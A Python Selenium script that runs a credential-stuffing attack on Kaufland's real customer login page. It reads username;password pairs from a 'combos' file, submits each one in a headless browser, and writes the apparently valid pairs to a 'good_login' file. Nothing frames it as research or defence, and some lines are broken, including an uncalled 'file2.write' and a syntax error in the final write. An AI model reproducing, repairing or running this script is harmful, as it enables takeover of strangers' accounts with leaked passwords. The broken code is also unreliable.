# Generated by Selenium IDE
import time
from datetime import datetime
from selenium.webdriver.chrome.options import Options
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
chrome_options = Options()
chrome_options.add_argument("--headless")

startTime = datetime.now()

PATH = "/home/bomba/Desktop/chromedriver"
driver = webdriver.Chrome(PATH,options=chrome_options)
wait = WebDriverWait(driver, 10)
wait_less = WebDriverWait(driver, 1)

a = open("combos","r")
stop = "default"
file = [s.rstrip()for s in a.readlines()]
for lines in file:
    combo = lines.split(";")
    param={
        "username":combo[0],
        "password":combo[1]
    }
    try:
        time.sleep(2)
        driver.get("https://account.kaufland.com/user-ui/login?groupname=default&lang=en-US,en;q%3D0.9&view_type=login&return_url=https:%2F%2Fwww.kaufland.md%2Fro%2F&kc_locale=ro&ui_locales=ro&requestId=54e6580d-26a4-4e2a-8d02-0463075f12bc")
        email = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '.ng-untouched')))
        driver.find_element(By.CSS_SELECTOR, ".ng-untouched").click()
        driver.find_element(By.CSS_SELECTOR, ".ng-untouched").send_keys(combo[0])
        driver.find_element(By.CSS_SELECTOR, ".btn").click()
        driver.find_element(By.CSS_SELECTOR, ".ng-pristine").click()
        driver.find_element(By.CSS_SELECTOR, ".form-group > div > .form-control").send_keys(combo[1])
        driver.find_element(By.CSS_SELECTOR, ".form-group > div > .form-control").send_keys(Keys.ENTER)
        #time.sleep(1)
        element = wait_less.until(EC.presence_of_element_located((By.XPATH, '//*[@id="toast-container"]')))
        error_message = driver.find_element_by_xpath('//*[@id="toast-container"]').text
        if error_message == "E-mail/Număr telefon mobil sau parolă incorecte.":
            q = combo[0], combo[1]
            print(combo[0],combo[1],"-Bad Login")
            file2 = open("bad_login", "a")
            file2.write
    except TimeoutException:
        q = combo[0], combo[1]
        print(combo[0],combo[1],"-Loging Succesful")
        file2 = open("good_login", "a")
        file2.write(str(q)"\n")


    driver.delete_all_cookies()
    print (datetime.now() - startTime)
    if stop in combo[0]:
        driver.quit()






